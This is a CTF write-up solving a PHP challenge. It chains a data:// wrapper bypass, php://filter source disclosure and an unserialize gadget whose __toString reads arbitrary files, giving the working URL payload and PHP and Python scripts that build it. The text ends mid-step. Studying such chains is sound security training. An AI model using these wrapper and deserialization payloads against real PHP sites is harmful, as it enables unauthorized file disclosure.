1. Source code: three GET parameters (text, file, password) must each be constructed to pass its own check.
2. text: bypass the content check with the data:// pseudo-protocol, so that reading $text yields exactly the expected string "welcome to the zjctf":
text=data://text/plain,welcome to the zjctf
3. file: use the php://filter wrapper for the file inclusion. Including useless.php directly would execute it and show nothing; with convert.base64-encode the source is returned as base64 instead of being run:
file=php://filter/read=convert.base64-encode/resource=useless.php
Base64-decoding gives the source of useless.php:
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
4. password: build the deserialization PoC. Flag::__toString() reads whatever path its public file property holds and echoes it, so serialize a Flag whose file is flag.php:
<?php
class Flag{ //flag.php
    public $file = 'flag.php';
}
$a = new Flag();
echo urlencode(serialize($a));
?>
which gives the URL-encoded serialized string:
O%3A4%3A%22Flag%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D
5. In the final request, file must point at useless.php directly rather than through php://filter: the include has to actually execute useless.php so that class Flag is defined when $password is unserialized. The file property of the deserialized object then points at flag.php, and __toString() fires when the object is echoed, reading flag.php. Final payload:
?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O%3A4%3A"Flag"%3A1%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3B%7D
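The serialization and encoding from steps 4 and 5, as an added Python example that is not part of the original writeup: it implements PHP's serialize() format for an object with public string properties, reproduces the exact password value shown above without needing a PHP interpreter, and assembles all three parameters into one request. The base path /index.php is an assumption; the parameter names and values are the ones used in the writeup.

```python
"""Build the NiZhuanSiWei payload: PHP-style serialization of the Flag gadget
plus URL encoding of the three GET parameters (added example, not the writeup's code)."""
from urllib.parse import quote, urlencode


def php_serialize_string(s: str) -> str:
    """PHP serialize() format for a string: s:<byte length>:"<value>";
    PHP counts bytes, not characters, so measure the UTF-8 encoding."""
    raw = s.encode("utf-8")
    return 's:%d:"%s";' % (len(raw), s)


def php_serialize_object(class_name: str, props: dict) -> str:
    """PHP serialize() format for an object with public properties:
    O:<name length>:"<Class>":<property count>:{<name><value>...}
    Only string-valued properties are supported, which is all the Flag gadget needs."""
    body = "".join(
        php_serialize_string(name) + php_serialize_string(value)
        for name, value in props.items()
    )
    return 'O:%d:"%s":%d:{%s}' % (
        len(class_name.encode("utf-8")), class_name, len(props), body
    )


def flag_gadget(target: str = "flag.php") -> str:
    """Serialized Flag object whose `file` property is the path that
    Flag::__toString() passes to file_get_contents()."""
    return php_serialize_object("Flag", {"file": target})


def encode_password(target: str = "flag.php") -> str:
    """URL-encode the gadget the way PHP's urlencode() does for these
    characters: ':' '"' '{' ';' '}' all become %XX escapes."""
    return quote(flag_gadget(target), safe="")


def build_url(base: str = "/index.php", target: str = "flag.php") -> str:
    """Assemble the full request. `base` is an assumed path. `file` must be the
    real useless.php, not a php://filter view of it: the include has to execute
    so that class Flag exists when $password is unserialized."""
    params = {
        "text": "data://text/plain,welcome to the zjctf",
        "file": "useless.php",
        "password": flag_gadget(target),
    }
    # quote_via=quote encodes spaces as %20 (as in the writeup) rather than '+'
    return base + "?" + urlencode(params, quote_via=quote)


if __name__ == "__main__":
    print(flag_gadget())
    print(encode_password())
    print(build_url())
```

Note that the writeup's final payload leaves the double quotes unencoded while encoding the colons; PHP decodes both forms identically, so either works. The byte-length detail matters when a target path contains non-ASCII characters: a wrong length makes unserialize() fail silently and return false.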
View the page source: the contents of flag.php are echoed into the response, and a PHP file's text does not render in the browser, so look at the raw HTML: